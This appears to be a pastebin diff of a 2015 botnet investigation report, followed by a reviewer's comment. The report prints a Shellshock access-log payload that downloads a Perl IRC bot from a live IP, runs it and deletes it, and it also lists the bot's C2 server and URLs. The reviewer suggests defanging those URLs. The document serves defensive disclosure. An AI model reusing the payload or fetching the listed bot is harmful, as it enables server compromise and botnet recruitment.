1 | http://pastebin.com/SPMkyZ4w - saga continues.. (: | |
2 | _____________________________________ | |
3 | [```` BOTNET INVESTIGATION REPORT ````] | |
4 | ````````````````````````````````````` | |
5 | ||
6 | - | Date: January 06, 2015 |
6 | + | Date: January 16, 2015 |
7 | Botnet type: IRC Bots/Malware | |
8 | Botnet control server IP: 64.32.12.57 (Sharktech.net) | |
9 | Protocol: IRC | |
10 | Port: 80 ( /connect 64.32.12.57 80 -j #new ) | |
11 | Hacked hosts: >500 | |
12 | Previous report of the same botnet: http://pastebin.com/DabxDiwm , http://pastebin.com/SPMkyZ4w | |
13 | Bot url: http://74.208.166.12/bot.txt (mirror: http://pastebin.com/Zbkke58A) | |
14 | (u17173405.onlinehome-server.com Numerical: 74.208.166.12) | |
15 | ||
16 | Access log: | |
17 | 217.114.212.26 - - [16/Jan/2015:15:46:35 -0500] "GET /phppath/cgi_wrapper HTTP/1.0" 404 162 "-" "() { :;};/usr/bin/perl -e 'print \x22Content-Type: text/plain\x5Cr\x5Cn\x5Cr\x5CnXSUCCESSX\x22;system(\x22wget http://74.208.166.12/bot.txt -O /tmp/bot.pl;perl /tmp/bot.pl;rm -rf /tmp/bot.pl\x22);'" | |
18 | ||
19 | ||
20 | We can clearly see that this is a shell-shock exploitation try and the source code is here: | |
21 | http://74.208.166.12/bot.txt ( MIRROR: http://pastebin.com/Zbkke58A ) | |
22 | ||
23 | From the source code we can clearly see that this is an IRC bot that connects to a following server: | |
24 | $servidor='64.32.12.57' unless $servidor; | |
25 | my $porta='80'; | |
26 | my @canais=("#new"); | |
27 | my @adms=("X","Y"); | |
28 | my @auth=("*!*@evil"); | |
29 | ||
30 | Hey, whoever you are, it's a third time I reporting you to the public, maybe you'll stop attacking my server? I see you are enjoying everyone using your botnet :-) Good luck. |
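Review bot: The access-log entry on paste line 17 ends in `404 162`, but the analysis on paste line 20 only calls it an "exploitation try" and never states the outcome. Say explicitly that the request for /phppath/cgi_wrapper returned 404 (not found), so a reader can tell whether the payload in the User-Agent header could have run on the reporting server. The Date change on paste line 6 to January 16 now agrees with the 16/Jan/2015 log timestamp. "Hacked hosts: >500" on paste line 11 is given without saying how it was counted; add the method or the source of the figure. Consider defanging the live bot URL on paste lines 13 and 21 (for example hxxp://74.208.166[.]12/bot.txt) so it is not fetched by accident from the report.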